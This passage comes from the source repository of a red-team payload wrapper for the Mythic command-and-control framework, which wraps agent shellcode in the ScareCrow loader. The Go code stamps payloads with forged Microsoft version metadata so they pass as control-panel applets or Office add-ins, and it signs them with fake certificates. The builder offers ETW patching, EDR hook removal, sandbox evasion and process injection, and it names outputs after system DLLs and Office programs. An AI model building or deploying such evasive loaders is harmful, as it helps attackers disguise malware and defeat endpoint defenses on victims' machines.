10 981 | vi.FixedFileInfo.ProductVersion.Minor = 0 982 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 983 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 984 | vi.FixedFileInfo.FileVersion.Major = 10 985 | vi.FixedFileInfo.FileVersion.Minor = 0 986 | vi.FixedFileInfo.FileVersion.Patch = 18362 987 | vi.FixedFileInfo.FileVersion.Build = 1 988 | vi.StringFileInfo.InternalName = "telephon.cpl" 989 | } 990 | if name == "datetime" { 991 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 992 | vi.StringFileInfo.InternalName = "timedate.cpl" 993 | vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet" 994 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 995 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
996 | vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui" 997 | vi.FixedFileInfo.ProductVersion.Patch = 18362 998 | vi.FixedFileInfo.ProductVersion.Major = 10 999 | vi.FixedFileInfo.ProductVersion.Minor = 0 1000 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 1001 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 1002 | vi.FixedFileInfo.FileVersion.Major = 10 1003 | vi.FixedFileInfo.FileVersion.Minor = 0 1004 | vi.FixedFileInfo.FileVersion.Patch = 18362 1005 | vi.FixedFileInfo.FileVersion.Build = 1 1006 | vi.StringFileInfo.InternalName = "timedate.cpl" 1007 | } 1008 | if name == "winsec" { 1009 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1010 | vi.StringFileInfo.InternalName = "wscui.cpl" 1011 | vi.StringFileInfo.FileDescription = "Security and Maintenance" 1012 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 1013 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1014 | vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui" 1015 | vi.FixedFileInfo.ProductVersion.Patch = 18362 1016 | vi.FixedFileInfo.ProductVersion.Major = 10 1017 | vi.FixedFileInfo.ProductVersion.Minor = 0 1018 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 1019 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 1020 | vi.FixedFileInfo.FileVersion.Major = 10 1021 | vi.FixedFileInfo.FileVersion.Minor = 0 1022 | vi.FixedFileInfo.FileVersion.Patch = 18362 1023 | vi.FixedFileInfo.FileVersion.Build = 1 1024 | vi.StringFileInfo.InternalName = "wscui.cpl" 1025 | } 1026 | if name == "Timesheet" { 1027 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1028 | vi.StringFileInfo.InternalName = "Timesheet.xll " 1029 | vi.StringFileInfo.FileDescription = "Timesheet ToolPak" 1030 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1031 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
1032 | vi.StringFileInfo.OriginalFilename = "Timesheet.xll" 1033 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1034 | vi.FixedFileInfo.ProductVersion.Major = 16 1035 | vi.FixedFileInfo.ProductVersion.Minor = 0 1036 | vi.StringFileInfo.ProductName = "Microsoft Office" 1037 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1038 | vi.FixedFileInfo.FileVersion.Major = 16 1039 | vi.FixedFileInfo.FileVersion.Minor = 0 1040 | vi.FixedFileInfo.FileVersion.Patch = 10001 1041 | vi.FixedFileInfo.FileVersion.Build = 10000 1042 | vi.StringFileInfo.InternalName = "Timesheet.xll" 1043 | } 1044 | if name == "Reports" { 1045 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1046 | vi.StringFileInfo.InternalName = "Reports.xll " 1047 | vi.StringFileInfo.FileDescription = "Report ToolPak" 1048 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1049 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1050 | vi.StringFileInfo.OriginalFilename = "Reports.xll" 1051 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1052 | vi.FixedFileInfo.ProductVersion.Major = 16 1053 | vi.FixedFileInfo.ProductVersion.Minor = 0 1054 | vi.StringFileInfo.ProductName = "Microsoft Office" 1055 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1056 | vi.FixedFileInfo.FileVersion.Major = 16 1057 | vi.FixedFileInfo.FileVersion.Minor = 0 1058 | vi.FixedFileInfo.FileVersion.Patch = 10001 1059 | vi.FixedFileInfo.FileVersion.Build = 10000 1060 | vi.StringFileInfo.InternalName = "Reports.xll" 1061 | } 1062 | if name == "Zoom" { 1063 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1064 | vi.StringFileInfo.InternalName = "Zoom.xll" 1065 | vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak" 1066 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1067 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
1068 | vi.StringFileInfo.OriginalFilename = "Zoom.xll" 1069 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1070 | vi.FixedFileInfo.ProductVersion.Major = 16 1071 | vi.FixedFileInfo.ProductVersion.Minor = 0 1072 | vi.StringFileInfo.ProductName = "Microsoft Office" 1073 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1074 | vi.FixedFileInfo.FileVersion.Major = 16 1075 | vi.FixedFileInfo.FileVersion.Minor = 0 1076 | vi.FixedFileInfo.FileVersion.Patch = 10001 1077 | vi.FixedFileInfo.FileVersion.Build = 10000 1078 | vi.StringFileInfo.InternalName = "Zoom.xll" 1079 | } 1080 | if name == "Updates" { 1081 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1082 | vi.StringFileInfo.InternalName = "Updates.xll " 1083 | vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak" 1084 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1085 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1086 | vi.StringFileInfo.OriginalFilename = "Updates.xll" 1087 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1088 | vi.FixedFileInfo.ProductVersion.Major = 16 1089 | vi.FixedFileInfo.ProductVersion.Minor = 0 1090 | vi.StringFileInfo.ProductName = "Microsoft Office" 1091 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1092 | vi.FixedFileInfo.FileVersion.Major = 16 1093 | vi.FixedFileInfo.FileVersion.Minor = 0 1094 | vi.FixedFileInfo.FileVersion.Patch = 10001 1095 | vi.FixedFileInfo.FileVersion.Build = 10000 1096 | vi.StringFileInfo.InternalName = "Updates.xll" 1097 | } 1098 | 1099 | if name == "Calendar" { 1100 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1101 | vi.StringFileInfo.InternalName = "Calendar.xll " 1102 | vi.StringFileInfo.FileDescription = "Calendar ToolPak" 1103 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1104 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
1105 | vi.StringFileInfo.OriginalFilename = "Calendar.xll" 1106 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1107 | vi.FixedFileInfo.ProductVersion.Major = 16 1108 | vi.FixedFileInfo.ProductVersion.Minor = 0 1109 | vi.StringFileInfo.ProductName = "Microsoft Office" 1110 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1111 | vi.FixedFileInfo.FileVersion.Major = 16 1112 | vi.FixedFileInfo.FileVersion.Minor = 0 1113 | vi.FixedFileInfo.FileVersion.Patch = 10001 1114 | vi.FixedFileInfo.FileVersion.Build = 10000 1115 | vi.StringFileInfo.InternalName = "Calendar.xll" 1116 | } 1117 | if name == "Memo" { 1118 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1119 | vi.StringFileInfo.InternalName = "Memo.xll " 1120 | vi.StringFileInfo.FileDescription = "Memo ToolPak" 1121 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1122 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1123 | vi.StringFileInfo.OriginalFilename = "Memo.xll" 1124 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1125 | vi.FixedFileInfo.ProductVersion.Major = 16 1126 | vi.FixedFileInfo.ProductVersion.Minor = 0 1127 | vi.StringFileInfo.ProductName = "Microsoft Office" 1128 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1129 | vi.FixedFileInfo.FileVersion.Major = 16 1130 | vi.FixedFileInfo.FileVersion.Minor = 0 1131 | vi.FixedFileInfo.FileVersion.Patch = 10001 1132 | vi.FixedFileInfo.FileVersion.Build = 10000 1133 | vi.StringFileInfo.InternalName = "Memo.xll" 1134 | } 1135 | if name == "Desk" { 1136 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1137 | vi.StringFileInfo.InternalName = "Desk.xll " 1138 | vi.StringFileInfo.FileDescription = "Office Desktop ToolPak" 1139 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1140 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 
1141 | vi.StringFileInfo.OriginalFilename = "Desk.xll" 1142 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1143 | vi.FixedFileInfo.ProductVersion.Major = 16 1144 | vi.FixedFileInfo.ProductVersion.Minor = 0 1145 | vi.StringFileInfo.ProductName = "Microsoft Office" 1146 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1147 | vi.FixedFileInfo.FileVersion.Major = 16 1148 | vi.FixedFileInfo.FileVersion.Minor = 0 1149 | vi.FixedFileInfo.FileVersion.Patch = 10001 1150 | vi.FixedFileInfo.FileVersion.Build = 10000 1151 | vi.StringFileInfo.InternalName = "Desk.xll" 1152 | } 1153 | 1154 | if name == "Appwiz" { 1155 | vi.StringFileInfo.CompanyName = "Microsoft Corporation" 1156 | vi.StringFileInfo.InternalName = "Appwiz.xll " 1157 | vi.StringFileInfo.FileDescription = "Application Installer ToolPak" 1158 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1159 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1160 | vi.StringFileInfo.OriginalFilename = "Appwiz.xll" 1161 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1162 | vi.FixedFileInfo.ProductVersion.Major = 16 1163 | vi.FixedFileInfo.ProductVersion.Minor = 0 1164 | vi.StringFileInfo.ProductName = "Microsoft Office" 1165 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1166 | vi.FixedFileInfo.FileVersion.Major = 16 1167 | vi.FixedFileInfo.FileVersion.Minor = 0 1168 | vi.FixedFileInfo.FileVersion.Patch = 10001 1169 | vi.FixedFileInfo.FileVersion.Build = 10000 1170 | vi.StringFileInfo.InternalName = "Appwiz.xll" 1171 | } 1172 | } 1173 | vi.VarFileInfo.Translation.LangID = goversioninfo.LangID(1033) 1174 | vi.VarFileInfo.Translation.CharsetID = goversioninfo.CharsetID(1200) 1175 | 1176 | vi.Build() 1177 | vi.Walk() 1178 | 1179 | var archs []string 1180 | archs = []string{"amd64"} 1181 | for _, item := range archs { 1182 | fileout := "resource_windows.syso" 1183 | if err := vi.WriteSyso(fileout, item); err != nil { 1184 | log.Printf("Error writing syso: %v", err) 1185 | 
os.Exit(3) 1186 | } 1187 | } 1188 | fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties") 1189 | return name 1190 | } 1191 | 1192 | func Signer(domain string, password string, valid string, inputFile string) { 1193 | outFile := inputFile 1194 | 1195 | if valid != "" { 1196 | fmt.Println("[*] Signing " + inputFile + " With a Valid Cert " + valid) 1197 | os.Rename(inputFile, inputFile+".old") 1198 | inputFile = inputFile + ".old" 1199 | SignExecutable(password, valid, inputFile, outFile) 1200 | 1201 | } else { 1202 | password := VarNumberLength(8, 12) 1203 | pfx := domain + ".pfx" 1204 | fmt.Println("[*] Signing " + inputFile + " With a Fake Cert") 1205 | os.Rename(inputFile, inputFile+".old") 1206 | inputFile = inputFile + ".old" 1207 | GenerateCert(domain, inputFile) 1208 | GeneratePFK(password, domain) 1209 | SignExecutable(password, pfx, inputFile, outFile) 1210 | } 1211 | 1212 | os.Remove(domain + ".pem") 1213 | os.Remove(domain + ".key") 1214 | os.Remove(domain + ".pfx") 1215 | fmt.Println("[+] Signed File Created") 1216 | 1217 | } 1218 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/main.json: -------------------------------------------------------------------------------- 1 | { 2 | "FixedFileInfo": { 3 | "FileVersion": { 4 | "Major": 1, 5 | "Minor": 0, 6 | "Patch": 0, 7 | "Build": 0 8 | }, 9 | "ProductVersion": { 10 | "Major": 1, 11 | "Minor": 0, 12 | "Patch": 0, 13 | "Build": 0 14 | } 15 | }, 16 | "StringFileInfo": { 17 | "CompanyName": "Microsoft Corporation", 18 | "FileDescription": "Microsoft Corporation", 19 | "FileVersion": "Microsoft Corporation", 20 | "InternalName": "test", 21 | "LegalCopyright": "Microsoft Corporation", 22 | "OriginalFilename": "Microsoft Corporation", 23 | "ProductName": "Microsoft Corporation", 24 | "ProductVersion": "Microsoft Corporation" 25 | } 26 | } 27 | 
-------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/agent_functions/__init__.py: -------------------------------------------------------------------------------- 1 | import glob 2 | from os.path import basename 3 | 4 | # Get file paths of all modules. 5 | modules = glob.glob("agent_functions/*.py") 6 | __all__ = [basename(x)[:-3] for x in modules if x != "__init__.py"] 7 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/agent_functions/builder.py: -------------------------------------------------------------------------------- 1 | from mythic_payloadtype_container.PayloadBuilder import * 2 | from mythic_payloadtype_container.MythicCommandBase import * 3 | import asyncio 4 | import os 5 | import tempfile 6 | from distutils.dir_util import copy_tree 7 | import base64 8 | 9 | 10 | class ScarecrowWrapper(PayloadType): 11 | name = "scarecrow_wrapper" 12 | file_extension = "exe" 13 | author = "Kyle Avery" 14 | supported_os = [SupportedOS.Windows] 15 | wrapper = True 16 | wrapped_payloads = [] 17 | note = "" 18 | supports_dynamic_loading = False 19 | build_parameters = { 20 | "loader": BuildParameter( 21 | name="loader", 22 | parameter_type=BuildParameterType.ChooseOne, 23 | description="Loader - Sets the type of process that will sideload the malicious payload. 
Note: Binary, Control, and DLL loaders require shellcode as input while Excel, Msiexec, and Wscript loaders require a PE file.", 24 | choices=["control", "binary", "dll"], 25 | ), 26 | "etw": BuildParameter( 27 | name="etw", 28 | parameter_type=BuildParameterType.ChooseOne, 29 | description="ETW - Enables ETW patching to prevent ETW events from being generated.", 30 | choices=["true", "false"], 31 | ), 32 | "console": BuildParameter( 33 | name="console", 34 | parameter_type=BuildParameterType.ChooseOne, 35 | description="Console (Only for Binary Payloads) - Generates verbose console information when the payload is executed. This will disable the hidden window feature.", 36 | choices=["true", "false"], 37 | ), 38 | "sandbox": BuildParameter( 39 | name="sandbox", 40 | parameter_type=BuildParameterType.ChooseOne, 41 | description="Sandbox - Enables sandbox evasion using IsDomainedJoined calls.", 42 | choices=["true", "false"], 43 | ), 44 | "unmodified": BuildParameter( 45 | name="unmodified", 46 | parameter_type=BuildParameterType.ChooseOne, 47 | description="Unmodified - (Only for DLL Payloads) When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.", 48 | choices=["true", "false"], 49 | default_value="false", 50 | ), 51 | "injection": BuildParameter( 52 | name="injection", 53 | parameter_type=BuildParameterType.String, 54 | required=False, 55 | description="Injection - Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).", 56 | default_value="", 57 | ), 58 | "domain": BuildParameter( 59 | name="domain", 60 | required=True, 61 | parameter_type=BuildParameterType.String, 62 | description="Domain - The domain name to use for creating a fake code signing cert.", 63 | default_value="www.acme.com", 64 | ), 65 | } 66 | c2_profiles = [] 67 | 68 | async def build(self) -> BuildResponse: 69 | # this function gets called to create an instance of your 
payload 70 | resp = BuildResponse(status=BuildStatus.Error) 71 | output = "" 72 | try: 73 | if(self.get_parameter("loader") != "dll" and self.get_parameter("unmodified") == "true"): 74 | resp.build_stderr = "Cannot use Unmodified option with a loader type other than DLL!" 75 | return resp 76 | agent_build_path = tempfile.TemporaryDirectory(suffix=self.uuid).name 77 | # shutil to copy payload files over 78 | copy_tree(self.agent_code_path, agent_build_path) 79 | working_path = "{}/original.exe".format(agent_build_path) 80 | output_path ="{}/output.exe".format(agent_build_path) 81 | 82 | with open(str(working_path), "wb") as f: 83 | f.write(base64.b64decode(self.wrapped_payload)) 84 | with open(str(working_path), "rb") as f: 85 | header = f.read(2) 86 | if header == b"\x4d\x5a": # if PE file 87 | resp.build_stderr = "Supplied payload is a PE instead of raw shellcode." 88 | return resp 89 | 90 | command = "cd {}/ScareCrow/; go build; chmod +x ScareCrow; ./ScareCrow ".format(agent_build_path, agent_build_path) 91 | command += "-I {} -Loader {}{}{}{}{}{}".format( 92 | working_path, 93 | self.get_parameter("loader"), 94 | " -etw" if self.get_parameter("etw") == "true" else "", 95 | " -console" if self.get_parameter("console") == "true" else "", 96 | " -injection {}".format(self.get_parameter("injection")) if self.get_parameter("injection") != "" else "", 97 | " -domain {}".format(self.get_parameter("domain")) if self.get_parameter("domain") != "" else "", 98 | " -sandbox" if self.get_parameter("sandbox") == "true" else "", 99 | " -unmodified" if self.get_parameter("unmodified") == "true" else "", 100 | ) 101 | 102 | proc = await asyncio.create_subprocess_shell( 103 | command, 104 | stdout=asyncio.subprocess.PIPE, 105 | stderr=asyncio.subprocess.PIPE, 106 | cwd=agent_build_path, 107 | ) 108 | stdout, stderr = await proc.communicate() 109 | if stdout: 110 | output += f"[stdout]\n{stdout.decode()}" 111 | if stderr: 112 | output += f"[stderr]\n{stderr.decode()}" 113 | 114 | 
if(self.get_parameter("loader") == "control"): 115 | names = ["appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"] 116 | extension = ".cpl" 117 | elif(self.get_parameter("loader") == "binary"): 118 | names = ["Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"] 119 | extension = ".exe" 120 | elif(self.get_parameter("loader") == "dll"): 121 | names = ["apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"] 122 | extension = ".dll" 123 | 124 | for name in names: 125 | output_name = name + extension 126 | output_path = "{}/ScareCrow/{}".format(agent_build_path, output_name) 127 | if os.path.exists(output_path): 128 | resp.payload = open(output_path, "rb").read() 129 | resp.status = BuildStatus.Success 130 | resp.build_message = "Command: " + command + "\n" + "New ScareCrow payload created! 
- {}".format(output_name) 131 | return resp 132 | resp.payload = b"" 133 | resp.build_stderr = "Failed, output: " + output + "\n Output path: " + output_path 134 | except Exception as e: 135 | raise Exception(str(e) + "\n" + output) 136 | return resp 137 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/mythic_service.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from mythic_payloadtype_container import mythic_service 3 | mythic_service.start_service_and_heartbeat() 4 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/payload_service.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd /Mythic/mythic 4 | 5 | export PYTHONPATH=/Mythic:/Mythic/mythic 6 | 7 | python3.8 mythic_service.py 8 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/mythic/rabbitmq_config.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "mythic_user", 3 | "password": "mythic_password", 4 | "virtual_host": "mythic_vhost", 5 | "host": "127.0.0.1", 6 | "name": "hostname", 7 | "container_files_path": "/Mythic/" 8 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ScareCrow Wrapper 2 | A wrapper payload for [Mythic](https://github.com/its-a-feature/Mythic) that wraps any agent shellcode with the [ScareCrow](https://github.com/optiv/ScareCrow) loader. This wrapper currently supports CPL, EXE, and DLL payload types from ScareCrow. 3 | 4 | ## Usage 5 | In Mythic, go to Create Components > Create Wrapper and then select "scarecrow_wrapper". 
Select or enter the desired configuration options, then select the payload you would like to wrap. Once generation is complete, go to Operational Views > Created Payloads to download the output file. The intended filename is shown in Payload Actions > View Build Message. 6 | 7 | ## How to install an agent in this format within Mythic 8 | 9 | When it is time to test your install, or for another user to install your agent, the process is simple. Within Mythic you can run the `mythic-cli` binary to install it in one of three ways: 10 | 11 | * `sudo ./mythic-cli install github https://github.com/user/repo` to install the main branch 12 | * `sudo ./mythic-cli install github https://github.com/user/repo branchname` to install a specific branch of that repo 13 | * `sudo ./mythic-cli install folder /path/to/local/folder/cloned/from/github` to install from an already-cloned copy of an agent repo 14 | 15 | Now, you might be wondering _when_ you or a user should do this to properly add your agent to a Mythic instance. There is no wrong answer here; it depends on your preference. The three options are: 16 | 17 | * If Mythic is already up and running, you can run the install command and then direct that agent's containers to start (i.e. `sudo ./mythic-cli payload start agentName`; if that agent has its own special C2 containers, you will need to start them too via `sudo ./mythic-cli c2 start c2profileName`). 18 | * If Mythic is already up and running but you want to minimize your steps, you can install the agent and run `sudo ./mythic-cli mythic start`. That command first _stops_ all of your containers, then starts everything back up again, which also brings in the agent you just installed. 19 | * If Mythic is not running, you can install the agent and then run `sudo ./mythic-cli mythic start`. 
20 | 21 | -------------------------------------------------------------------------------- /agent_icons/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/agent_icons/.keep -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "exclude_payload_type": false, 3 | "exclude_c2_profiles": false, 4 | "exclude_documentation_payload": false, 5 | "exclude_documentation_c2": false, 6 | "exclude_agent_icons": false 7 | } 8 | -------------------------------------------------------------------------------- /documentation-c2/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-c2/.keep -------------------------------------------------------------------------------- /documentation-payload/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-payload/.keep -------------------------------------------------------------------------------- /documentation-wrapper/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-wrapper/.keep --------------------------------------------------------------------------------